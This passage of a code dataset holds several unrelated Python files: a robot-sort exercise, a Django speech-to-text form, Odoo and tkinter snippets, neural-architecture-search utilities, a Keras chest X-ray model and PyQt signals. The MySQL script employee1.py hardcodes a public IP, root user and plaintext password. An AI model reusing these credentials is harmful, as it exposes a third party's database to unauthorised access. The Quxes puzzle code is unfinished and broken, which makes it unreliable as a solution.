self.light_is_on():\n self.set_light_off()\n # checking to see if it can move right\n while self.can_move_right():\n # pick up item and then move right\n self.swap_item()\n self.move_right()\n # now we need to go and compare the items\n # if item held is larger than one in front\n if self.compare_item() == 1:\n self.swap_item()\n self.move_left()\n self.swap_item()\n self.move_right()\n self.set_light_on()\n # if item held is smaller or same than one in front\n else:\n self.move_left()\n self.swap_item()\n self.move_right()\n # when we hit end of list and cant move right, we go back and start over with comparing\n # while self.can_move_right() is False: ## 🤬🤬🤬🤬\n # instead of checking if moving right is false- that will only take you one space back\n # and then can_move_right will go back to true... make it can_move_left until that turns false\n # and start our checks again... yikes\n while self.can_move_left():\n self.move_left()\n\n # if nothing is swapped, the light stays off and we know everything is sorted\n\n \n \n \n\n # Fill this out\n #pass\n\n\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python robot_sort.py`\n\n l = [15, 41, 58, 49, 26, 4, 28, 8, 61, 60, 65, 21, 78, 14, 35, 90, 54, 5, 0, 87, 82, 96, 43, 92, 62, 97, 69, 94, 99, 93, 76, 47, 2, 88, 51, 40, 95, 6, 23, 81, 30, 19, 25, 91, 18, 68, 71, 9, 66, 1, 45, 33, 3, 72, 16, 85, 27, 59, 64, 39, 32, 24, 38, 84, 44, 80, 11, 73, 42, 20, 10, 29, 22, 98, 17, 48, 52, 67, 53, 74, 77, 37, 63, 31, 7, 75, 36, 89, 70, 34, 79, 83, 13, 57, 86, 12, 56, 50, 55, 46]\n\n robot = SortingRobot(l)\n\n robot.sort()\n print(robot._list)","sub_path":"robot_sort/robot_sort.py","file_name":"robot_sort.py","file_ext":"py","file_size_in_byte":6192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"651652588","text":"from django.forms import forms\nimport speech_recognition, ffmpy, os\n\n\nclass FileUploadForm(forms.Form):\n file = forms.FileField()\n\n\nclass stt:\n def speechTOrecognition (input_file):\n \n ff = ffmpy.FFmpeg(\n inputs = { input_file : None },\n outputs = {'output.wav' : None }\n )\n ff.run()\n\n input_file = 'output.wav'\n\n r = speech_recognition.Recognizer()\n with speech_recognition.AudioFile(input_file) as source:\n audio = r.record(source)\n sttResult = r.recognize_google(audio,language='zh-tw')\n os.remove('output.wav')\n return sttResult\n \n\n\n","sub_path":"mysite/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"247700831","text":"import mysql.connector\n# from mysql.connector import *\ncon = mysql.connector.connect(host='18.219.99.141', database='db1', user='root', password='India12345')\n#con = mysql.connector.connect(host='localhost', database='db1', user='root', password='mithalal')\nc = con.cursor()\n\n\ndef create_table():\n c.execute(\"create table nirma_employee(empid varchar(10), empname varchar(20), salary varchar(8))\")\n\n\ndef insert_table():\n c.execute(\"insert into nirma_employee values('1001', 'raj', '20000')\")\n c.execute(\"insert into nirma_employee values('1002', 'swathi', '25000')\")\n c.execute(\"insert into nirma_employee values('1003', 'akash', '12000')\")\n c.execute(\"insert into nirma_employee values('1004', 'simran', '22000')\")\n c.execute(\"insert into nirma_employee values('1005', 'rahul', '200000')\")\n con.commit()\n\n\ndef select_table():\n c.execute('select * from nirma_employee')\n data = c.fetchall()\n for row in data:\n print(row)\n\n\ndef update_table():\n c.execute(\"update nirma_employee set salary='15000' where empid='1003'\")\n con.commit()\n\n\ndef delete_table():\n c.execute(\"delete from nirma_employee where empid='1005'\")\n con.commit()\n\n\ncreate_table()\ninsert_table()\nupdate_table()\ndelete_table()\nselect_table()\nc.close()\ncon.close()\n","sub_path":"employee1.py","file_name":"employee1.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535989197","text":"class UserBook:\n \"\"\"\n An object to store the book data and the user's\n rating, etc of the book\n \"\"\"\n\n def __init__(self):\n self.book = None # The book object\n self.goodreads_id = \"No gid\"\n\n self.rating = \"No rating\"\n self.readcount = 0\n\n self.date_added = \"No added date\"\n self.date_purchased = \"No purchase date\"\n self.owned = \"No owned info\"\n self.purchase_location = None\n self.condition = None\n self.format = None\n self.review = None\n self.recomender = None\n self.notes = None\n self.comments = None\n self.votes = None\n self.date_pub_edition = None\n self.link = None\n","sub_path":"crawler/userbook.py","file_name":"userbook.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"508586918","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home),\n path('camisa/', views.camisa_list),\n path('camisa//', views.camisa_show),\n path('casual/', views.casual_list),\n path('casual//', views.casual_show),\n path('camisa/form/', views.camisa_form),\n path('casual/form/', views.casual_form),\n path('camisa//edit/', views.camisa_edit),\n path('casual//edit/', views.casual_edit)\n \n]\n","sub_path":"departamento/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"40632770","text":"'''\nThis problem was asked by Facebook.\n\nOn a mysterious island there are creatures known as \nQuxes which come in three colors: red, green, and blue. \nOne power of the Qux is that if two of them are standing \nnext to each other, they can transform into a \nsingle creature of the third color.\n\nGiven N Quxes standing in a line, determine the smallest \nnumber of them remaining after any possible sequence of such transformations.\n\nFor example, given the input ['R', 'G', 'B', 'G', 'B'], \nit is possible to end up with a single Qux through the following steps:\n\n\n Arrangement | Change\n----------------------------------------\n['R', 'G', 'B', 'G', 'B'] | (R, G) -> B\n['B', 'B', 'G', 'B'] | (B, G) -> R\n['B', 'R', 'B'] | (R, B) -> G\n['B', 'G'] | (B, G) -> R\n['R'] |\n'''\n\n\n# Recursive Approach -> DFS\n\nclass Node:\n def __init__(self,v,n:list=None):\n self.v = v\n self.neighs = n\n\ndef expand_branches(n:Node): #, state:list):\n state = n.v\n for i in range(len(state)-2):\n if state[i] != state[i+1]:\n n.neighs.append(Node(i))\n return\n\ndef get_min_sequence_helper(root, visited):\n expand_branches(root.v)\n # Base Case\n if len(root.n) <= 1:\n pass\n\n # Recursive Case\n for neigh in root.neighs:\n if neigh not in visited:\n visited.add(neigh)\n get_min_sequence_helper(neigh, visited)\n\ndef get_min_sequence(arr:list):\n root = Node(arr)\n visited = set()\n results = list()\n\nget_min_sequence\n","sub_path":"DailyCodingProblem/290_Quxes.py","file_name":"290_Quxes.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"649766510","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# Odoo Proprietary License v1.0\n#\n# This software and associated files (the \"Software\") may only be used (executed,\n# modified, executed after modifications) if you have purchased a valid license\n# from the authors, typically via Odoo Apps, or if you have received a written\n# agreement from the authors of the Software (see the COPYRIGHT file).\n#\n# You may develop Odoo modules that use the Software as a library (typically\n# by depending on it, importing it and using its resources), but without copying\n# any source code or material from the Software. You may distribute those\n# modules under the license of your choice, provided that this license is\n# compatible with the terms of the Odoo Proprietary License (For example:\n# LGPL, MIT, or proprietary licenses similar to this one).\n#\n# It is forbidden to publish, distribute, sublicense, or sell copies of the Software\n# or modified copies of the Software.\n#\n# The above copyright notice and this permission notice must be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n#\n# © 2018 Bernard K Too\n\"\"\"\n\nfrom odoo import models, api, _\n\n\nclass SendRAByEmail(models.Model):\n _inherit = [\"account.payment\", \"mail.thread\"]\n _name = \"account.payment\"\n\n @api.multi\n def SendByEmail(self):\n \"\"\"This function opens a window to compose an email, with the\n remittance email template.\"\"\"\n self.ensure_one()\n template_id = self.env.ref(\n 'remittance_advice_report.email_template_send_remittance').id\n compose_form_id = self.env.ref(\n 'mail.email_compose_message_wizard_form').id\n ctx = dict(\n default_model='account.payment',\n default_res_id=self.id,\n default_use_template=bool(template_id),\n default_template_id=template_id,\n default_composition_mode='comment',\n )\n\n return {\n 'name': _('Compose Email'),\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'mail.compose.message',\n 'views': [(compose_form_id, 'form')],\n 'view_id': compose_form_id,\n 'target': 'new',\n 'context': ctx,\n }\n","sub_path":"remittance_advice_report-V12/models/remittance.py","file_name":"remittance.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149691595","text":"import logging\nlogger = logging.getLogger(__name__)\n\nclass ThumbnailAdminMixin(object):\n \"\"\"\n Shortcut for displaying a thumbnail in a changelist (or inline).\n\n Requires easy-thumbnails.\n\n Specify ImageField name in `thumbnail_field`, and optionally override\n `thumbnail_options` for customisation such as sizing, cropping, etc.\n Plays nicely with list_display_links if you want a clickable thumbnail.\n\n Add 'thumbnail' to `list_display` or `readonly_fields`, etc to display.\n \"\"\"\n\n thumbnail_field = None\n thumbnail_options = {'size': (100,100)}\n\n def get_thumbnail_source(self, obj):\n if self.thumbnail_field:\n try:\n return getattr(obj, self.thumbnail_field)\n except AttributeError:\n logger.error(\n 'ThumbnailAdminMixin.thumbnail_field getattr failed')\n else:\n logger.warning('ThumbnailAdminMixin.thumbnail_field unspecified')\n\n def thumbnail(self, obj):\n source = self.get_thumbnail_source(obj)\n if source:\n from easy_thumbnails.files import get_thumbnailer\n thumbnailer = get_thumbnailer(source)\n try:\n thumbnail = thumbnailer.get_thumbnail(self.thumbnail_options)\n except Exception:\n return ''\n return ''.format(thumbnail.url)\n else:\n return ''\n thumbnail.allow_tags = True\n","sub_path":"generic/admin/mixins/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68184730","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title (\"Nado GUI\")\r\nbtn1 = Button(root, text=\"버튼1\")\r\nbtn1.pack()\r\n\r\n\r\nbtn2 = Button(root, padx=5, pady=10, text=\"버튼22222222222222222222\")\r\nbtn2.pack()\r\n\r\n\r\nbtn3 = Button(root, padx=10, pady=5, text=\"버튼3\")\r\nbtn3.pack()\r\n\r\n\r\nbtn4 = Button(root, width=20, height=2, text=\"버튼4444444444444444444444444\")\r\nbtn4.pack()\r\n\r\n\r\nbtn5 = Button(root, fg=\"red\", bg=\"yellow\", width=20, height=2, text=\"버튼4444444444444444444444444\")\r\nbtn5.pack()\r\n\r\nphoto = PhotoImage(file=\"D:\\Program Files\\PythonTutorial\\mysite\\gui_basic\\img.png\")\r\nbtn6 = Button(root, image=photo)\r\nbtn6.pack()\r\n \r\n\r\ndef btncmd():\r\n print(\"버튼을 클릭 했어요\")\r\n\r\nbtn7 = Button(root, text=\"동작하는 버튼\", command=btncmd)\r\nbtn7.pack()\r\n\r\n\r\nroot.mainloop()","sub_path":"gui_basic/2_button.py","file_name":"2_button.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"386480801","text":"\n\n#calss header\nclass _SCURRY():\n\tdef __init__(self,): \n\t\tself.name = \"SCURRY\"\n\t\tself.definitions = [u'to move quickly, with small, short steps: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_scurry.py","file_name":"_scurry.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215218816","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport logging\nimport os\nimport shutil\nimport time\nfrom datetime import timedelta\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.distributed as dist\n\nfrom genotypes import PRIMITIVES\nfrom operations import *\n\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\n\n\nclass AvgrageMeter(object):\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.avg = 0\n self.sum = 0\n self.cnt = 0\n\n def update(self, val, n=1):\n self.sum += val * n\n self.cnt += n\n self.avg = self.sum / self.cnt\n\n\nclass ExpMovingAvgrageMeter(object):\n\n def __init__(self, momentum=0.9):\n self.momentum = momentum\n self.reset()\n\n def reset(self):\n self.avg = 0\n\n def update(self, val):\n self.avg = (1. - self.momentum) * self.avg + self.momentum * val\n\n\ndef accuracy(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0/batch_size))\n return res\n\n\nclass Cutout(object):\n def __init__(self, length):\n self.length = length\n\n def __call__(self, img):\n h, w = img.size(1), img.size(2)\n mask = np.ones((h, w), np.float32)\n y = np.random.randint(h)\n x = np.random.randint(w)\n\n y1 = np.clip(y - self.length // 2, 0, h)\n y2 = np.clip(y + self.length // 2, 0, h)\n x1 = np.clip(x - self.length // 2, 0, w)\n x2 = np.clip(x + self.length // 2, 0, w)\n\n mask[y1: y2, x1: x2] = 0.\n mask = torch.from_numpy(mask)\n mask = mask.expand_as(img)\n img *= mask\n return img\n\n\ndef count_parameters_in_M(model):\n return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if \"auxiliary\" not in name)/1e6\n\n\ndef save_checkpoint(state, is_best, save):\n filename = os.path.join(save, 'checkpoint.pth.tar')\n torch.save(state, filename)\n if is_best:\n best_filename = os.path.join(save, 'model_best.pth.tar')\n shutil.copyfile(filename, best_filename)\n\n\ndef save(model, model_path):\n torch.save(model.state_dict(), model_path)\n\n\ndef load(model, model_path):\n model.load_state_dict(torch.load(model_path))\n\n\ndef drop_path(x, drop_prob):\n if drop_prob > 0.:\n keep_prob = 1.-drop_prob\n mask = torch.cuda.FloatTensor(\n x.size(0), 1, 1, 1).bernoulli_(keep_prob)\n x = x / keep_prob\n x = x * mask\n return x\n\n\ndef create_exp_dir(path, scripts_to_save=None):\n if not os.path.exists(path):\n os.makedirs(path, exist_ok=True)\n print('Experiment dir : {}'.format(path))\n\n if scripts_to_save is not None:\n if not os.path.exists(os.path.join(path, 'scripts')):\n os.mkdir(os.path.join(path, 'scripts'))\n for script in scripts_to_save:\n dst_file = os.path.join(path, 'scripts', os.path.basename(script))\n shutil.copyfile(script, dst_file)\n\n\nclass ClassErrorMeter(object):\n def __init__(self):\n super(ClassErrorMeter, self).__init__()\n self.class_counter = {}\n\n def add(self, output, target):\n _, pred = output.max(dim=1)\n\n target = list(target.cpu().numpy())\n pred = list(pred.cpu().numpy())\n\n for t, p in zip(target, pred):\n if t not in self.class_counter:\n self.class_counter[t] = {'num': 0, 'correct': 0}\n self.class_counter[t]['num'] += 1\n if t == p:\n self.class_counter[t]['correct'] += 1\n\n def value(self, method):\n print('Error type: ', method)\n if method == 'per_class':\n mean_accuracy = 0\n for t in self.class_counter:\n class_accuracy = float(self.class_counter[t]['correct']) / \\\n self.class_counter[t]['num']\n mean_accuracy += class_accuracy\n mean_accuracy /= len(self.class_counter)\n output = mean_accuracy * 100\n elif method == 'overall':\n num_total, num_correct = 0, 0\n for t in self.class_counter:\n num_total += self.class_counter[t]['num']\n num_correct += self.class_counter[t]['correct']\n output = float(num_correct) / num_total * 100\n return [100 - output]\n\n\ndef sample_gumbel(shape, eps=1e-20):\n U = torch.Tensor(shape).uniform_(0, 1).cuda()\n sample = -(torch.log(-torch.log(U + eps) + eps))\n return sample\n\n\ndef gumbel_softmax_sample_original(logits, temperature):\n y = logits + sample_gumbel(logits.size())\n return F.softmax(y / temperature, dim=-1)\n\n\ndef logsumexp(logits, dim):\n mx = torch.max(logits, dim, keepdim=True)[0]\n return torch.log(torch.sum(torch.exp(logits - mx), dim=dim, keepdim=True)) + mx\n\n\ndef gumbel_softmax_sample_improved(logits, temperature):\n def gsm(rho, q):\n return F.softmax((-torch.log(rho + 1e-20) + torch.log(q + 1e-20)) / temperature, dim=-1)\n q = F.softmax(logits, dim=-1)\n U = torch.Tensor(q.size()).uniform_(0, 1).cuda()\n U = torch.clamp(U, 1e-15, 1. - 1e-15)\n log_U = torch.log(U)\n rho = log_U / (torch.sum(log_U, dim=-1, keepdim=True))\n return gsm(rho.detach() - q + q.detach(), q.detach())\n\n\ndef gumbel_softmax_sample_rebar(logits, temperature):\n logits = logits - torch.logsumexp(logits, dim=-1, keepdim=True)\n q = F.softmax(logits, dim=-1)\n u = torch.Tensor(q.size()).uniform_(0, 1).cuda()\n u = torch.clamp(u, 1e-3, 1.-1e-3)\n\n # draw gsm samples\n z = logits - torch.log(- torch.log(u))\n gsm = F.softmax(z / temperature, dim=-1)\n\n # compute the correction term for conditional samples\n # see REBAR: https://arxiv.org/pdf/1703.07370.pdf\n k = torch.argmax(z, dim=-1, keepdim=True)\n # get v from u\n u_k = u.gather(-1, k)\n q_k = q.gather(-1, k)\n # This can cause numerical problems, better to work with log(v_k) = u_k / q_k\n # v_k = torch.pow(u_k, 1. / q_k)\n # v.scatter_(-1, k, v_k)\n log_vk = torch.log(u_k) / q_k\n log_v = torch.log(u) - q * log_vk\n\n # assume k and v are constant\n k = k.detach()\n log_vk = log_vk.detach()\n log_v = log_v.detach()\n g_hat = - torch.log(-log_v/q - log_vk)\n g_hat.scatter(-1, k, -torch.log(- log_vk))\n gsm1 = F.softmax(g_hat / temperature, dim=-1)\n\n return gsm - gsm1 + gsm1.detach()\n\n\ndef gumbel_softmax_sample(logits, temperature, gsm_type='improved'):\n if gsm_type == 'improved':\n return gumbel_softmax_sample_improved(logits, temperature)\n elif gsm_type == 'original':\n return gumbel_softmax_sample_original(logits, temperature)\n elif gsm_type == 'rebar':\n return gumbel_softmax_sample_rebar(logits, temperature)\n\n\ndef plot_alphas(alpha, display=True, title='', savename=''):\n fig, ax = plt.subplots()\n fig.set_figheight(10)\n fig.set_figwidth(7)\n\n alpha = alpha.data.cpu().numpy()\n\n num_edges = alpha.shape[0]\n ops = PRIMITIVES\n\n ax.xaxis.tick_top()\n plt.imshow(alpha, vmin=0, vmax=1)\n plt.xticks(range(len(ops)), ops)\n plt.xticks(rotation=30)\n plt.yticks(range(num_edges), range(1, num_edges+1))\n for i in range(num_edges):\n for j in range(len(ops)):\n val = alpha[i][j]\n val = '%.4f' % (val)\n ax.text(j, i, val, va='center',\n ha='center', color='white', fontsize=8)\n\n plt.colorbar()\n plt.tight_layout()\n fig.suptitle(title, fontsize=16, fontweight='bold')\n\n if savename:\n plt.savefig(savename)\n if display:\n plt.show()\n else:\n return fig\n\n\ndef plot_alphas_paired_input(alpha, display=True, title='', savename=''):\n fig, ax = plt.subplots(1, 2)\n fig.set_figheight(6)\n fig.set_figwidth(13)\n\n for idx, k in enumerate(sorted(alpha.keys())):\n prob = [F.softmax(a, dim=-1) for a in alpha[k]]\n if k == 'input':\n selector = torch.cat(prob, 1)\n elif k == 'combiner':\n selector = torch.cat(prob, 0).view(len(alpha[k]), -1)\n else:\n selector = torch.cat(prob, 0)\n\n selector = selector.data.cpu().numpy()\n im = ax[idx].imshow(selector, vmin=0, vmax=1)\n # ax[idx].set_title(k)\n ax[idx].set_xlabel(k)\n xticks = get_xticks(alpha[k], k)\n plt.sca(ax[idx])\n ax[idx].xaxis.tick_top()\n plt.xticks(range(len(xticks)), xticks)\n plt.xticks(ha='left', rotation=30, fontsize=8)\n plt.yticks(range(selector.shape[0]), range(1, selector.shape[0] + 1))\n\n cbaxes = fig.add_axes([0.05, 0.2, 0.01, 0.6])\n fig.colorbar(im, cax=cbaxes)\n cbaxes.yaxis.set_ticks_position('left')\n\n if savename:\n plt.savefig(savename)\n if display:\n plt.show()\n else:\n return fig\n\n\ndef get_xticks(alpha, key):\n if key == 'input':\n xticks = []\n for i in range(len(alpha)):\n for j in range(i+2):\n xticks.append(j)\n elif key == 'op':\n xticks = PRIMITIVES\n elif key == 'activation':\n xticks = ACTIVATIONS.keys()\n elif key == 'combiner':\n xticks = COMBINERS.keys()\n else:\n raise NotImplementedError\n\n return xticks\n\n\ndef generate_paired_indices(step):\n indices = []\n for i in range(step + 2):\n indices.append((i, i))\n\n for i in range(step + 2):\n for j in range(i + 1, step + 2):\n indices.append((i, j))\n\n return indices\n\n\nclass Logger(object):\n def __init__(self, rank, save):\n self.rank = rank\n if self.rank == 0:\n log_format = '%(asctime)s %(message)s'\n logging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\n fh = logging.FileHandler(os.path.join(save, 'log.txt'))\n fh.setFormatter(logging.Formatter(log_format))\n logging.getLogger().addHandler(fh)\n self.start_time = time.time()\n\n def info(self, string, *args):\n if self.rank == 0:\n elapsed_time = time.time() - self.start_time\n elapsed_time = time.strftime(\n '(Elapsed: %H:%M:%S) ', time.gmtime(elapsed_time))\n if isinstance(string, str):\n string = elapsed_time + string\n else:\n logging.info(elapsed_time)\n logging.info(string, *args)\n\n\nclass Writer(object):\n def __init__(self, rank, save):\n self.rank = rank\n if self.rank == 0:\n try:\n self.writer = SummaryWriter(log_dir=save, flush_secs=20)\n except:\n self.writer = SummaryWriter(logdir=save, flush_secs=20)\n\n def add_scalar(self, *args, **kwargs):\n if self.rank == 0:\n self.writer.add_scalar(*args, **kwargs)\n\n def add_figure(self, *args, **kwargs):\n if self.rank == 0:\n self.writer.add_figure(*args, **kwargs)\n\n def flush(self):\n if self.rank == 0:\n self.writer.flush()\n\n\ndef reduce_tensor(tensor, world_size):\n rt = tensor.clone()\n dist.all_reduce(rt, op=dist.ReduceOp.SUM)\n rt /= world_size\n return rt\n\n\ndef get_memory_usage(device=None):\n try:\n memory_cached = torch.cuda.max_memory_cached(device) * 1e-9\n memory_alloc = torch.cuda.max_memory_allocated(device) * 1e-9\n torch.cuda.reset_max_memory_allocated(device)\n torch.cuda.reset_max_memory_cached(device)\n except Exception:\n memory_cached, memory_alloc = 0., 0.\n return memory_cached, memory_alloc\n\n\ndef is_parametric(primitive):\n if primitive in {'none', 'skip_connect', 'max_pool_3x3', 'avg_pool_3x3'}:\n return False\n elif primitive in {'sep_conv_3x3', 'sep_conv_5x5', 'sep_conv_7x7', 'dil_conv_3x3', 'dil_conv_5x5'}:\n return True\n else:\n raise KeyError('primitive %s is not in the list' % primitive)\n\n\ndef fix_bn(m):\n classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n m.half()\n\n\nif __name__ == '__main__':\n avg_meter = ExpMovingAvgrageMeter(momentum=0.9)\n for i in range(100):\n avg_meter.update(i)\n print(avg_meter.avg)\n","sub_path":"cifar_imagenet/utils_arun.py","file_name":"utils_arun.py","file_ext":"py","file_size_in_byte":12380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490399548","text":"# Colm O Caoimh\n# Check if a number is prime.\n#The primes are 2, 3, 5, 7, 11, 13, ...\n\np = 347\nm = 2\nis_prime = True\n\nwhile m < p:\n if p % m == 0:\n is_prime = False\n m = m + 1\n\nif is_prime:\n print(p, \"is a prime number\")\nelse:\n print(p, \"is not prime.\")\n","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"652797042","text":"# 模拟竞赛系统,按照名次打印\nfrom random import randint\nfrom time import time\nfrom collections import OrderedDict\nfrom pip._vendor.distlib.compat import raw_input\n\nd = OrderedDict()\nplayers = list('ABCDEFGH')\npos = len(players)-1\nstart = time()\n\nfor i in range(len(players)):\n raw_input()\n\n p = players.pop(randint(0, pos - i))\n end = time()\n d[p] = (i+1,end - start)\nfor k,v in d.items():\n print(k,v)\n\n\n","sub_path":"home-study/study-code/python-code/ten/seven.py","file_name":"seven.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38097080","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.applications.densenet import DenseNet121\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.applications.nasnet import NASNetMobile\nfrom tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom dpn import DPN137, DPN92, DPN98, DPN107\n\n\nclass XChest():\n def __init__(self, classes=1000, model_name=None, input_shape=(256, 256, 3)):\n self.model_name = model_name\n self.classes = classes\n self.input_shape = input_shape\n self.optimizer = tf.keras.optimizers.RMSprop()\n self.loss = 'binary_crossentropy'\n self.list_model = {\n 'densenet': DenseNet121,\n 'xception': Xception,\n 'inceptionv3': InceptionV3,\n 'nasnet': NASNetMobile,\n 'inception_resnet_v2': InceptionResNetV2,\n 'dpn': DPN137\n }\n\n def build(self):\n if self.model_name in self.list_model:\n base_model = self.list_model[self.model_name](include_top=False, weights='imagenet',\n input_shape=self.input_shape, )\n\n x = base_model.output\n\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n output = tf.keras.layers.Dense(units=self.classes, activation=\"sigmoid\")(x)\n\n model = tf.keras.Model(base_model.input, output)\n\n model.compile(optimizer=self.optimizer, loss=self.loss,\n metrics=['accuracy'])\n return model\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"20625408","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nScript Name: UiSignals.py\nAuthor: Do Trinh/Jimmy - 3D artist.\n\nDescription:\n\n\"\"\"\n# -------------------------------------------------------------------------------------------------------------\nfrom __future__ import absolute_import, unicode_literals\n\"\"\" Import \"\"\"\n\n# Python\nimport os, json\n\n# PyQt5\nfrom PyQt5.QtCore import pyqtSignal\n\n# PLM\nfrom cores.Loggers import Loggers\nfrom appData import TMP_DIR\nfrom bin.data.damg import DAMG, DAMGLIST, DAMGDICT\n\n# -------------------------------------------------------------------------------------------------------------\n\"\"\" Signal class: setup all the signal which will be using. \"\"\"\n\nclass Signal(DAMG):\n\n key = 'Signal'\n\n _emittable = False\n\n # PLM class\n showLayout = pyqtSignal(str, str, name=\"showLayout\")\n executing = pyqtSignal(str, name=\"executing\")\n regisLayout = pyqtSignal(DAMG, name=\"regisLaout\")\n openBrowser = pyqtSignal(str, name=\"openBrowser\")\n setSetting = pyqtSignal(str, str, str, name=\"setSetting\")\n sysNotify = pyqtSignal(str, str, str, int, name=\"sysNotify\")\n loginChanged = pyqtSignal(bool, name='loginChanged')\n\n #\n updateAvatar = pyqtSignal(bool, name=\"updateAvatar\")\n\n # Settings class\n removeGrp = pyqtSignal(str, name='removeGroup')\n setFormat = pyqtSignal(str, name='setFormat')\n setScope = pyqtSignal(str, name='setScope')\n\n print_emittable = False\n print_emit = False\n print_block = False\n print_checkRepeat = False\n print_getSignal = False\n print_checkState = False\n auto_changeEmmittable = True\n\n _signals = DAMGDICT()\n _settings = DAMGDICT()\n\n states = DAMGDICT()\n\n def __init__(self, parent):\n super(Signal, self).__init__(parent)\n\n self.parent = parent\n self.logger = Loggers(self.parent.key)\n self.update()\n\n def update(self):\n return self.updateSignals(), self.updateSettings()\n\n def updateState(self):\n filePth = os.path.join(TMP_DIR, '.states')\n with open(filePth, 'w') as f:\n json.dump(self.states, f, indent=4)\n\n def loadState(self):\n filePth = os.path.join(TMP_DIR, '.states')\n if not os.path.exists(filePth):\n self.updateState()\n\n with open(filePth, 'r') as f:\n data = json.load(f)\n self.states.appendDict(data)\n\n def updateSignals(self):\n keys = ['showLayout', 'executing', 'regisLayout', 'openBrowser', 'setSetting', 'sysNotify', 'updateAvatar',\n 'loginChanged']\n signals = [self.showLayout, self.executing, self.regisLayout, self.openBrowser, self.setSetting, self.sysNotify,\n self.updateAvatar, self.loginChanged]\n olds = [self.showLayoutOld, self.executingOld, self.regisLayoutOld, self.openBrowserOld, self.setSettingOld,\n self.sysNotifyOld, self.updateAvatarOld, self.loginChangedOld]\n for i in range(len(keys)):\n key, signal, old = [keys[i], signals[i], olds[i]]\n self._signals.add(key, [signal, old])\n return self._signals\n\n def updateSettings(self):\n keys = ['emittable', 'emit', 'block', 'checkRepeat', 'getSignal', 'checkState']\n values = [self.print_emittable, self.print_emit, self.print_block, self.print_checkRepeat, self.print_getSignal,\n self.print_checkState]\n for i in range(len(keys)):\n self._settings.add(keys[i], values[i])\n return self._settings\n\n def changeSignalsSetting(self, key, value):\n self._settings[key] = value\n self._settings.update()\n return self._settings\n\n @property\n def signals(self):\n return self._signals\n\n @property\n def printCheckState(self):\n return self.print_checkState\n\n @property\n def autoChangeEmittable(self):\n return self.auto_changeEmmittable\n\n @property\n def printGetSignal(self):\n return 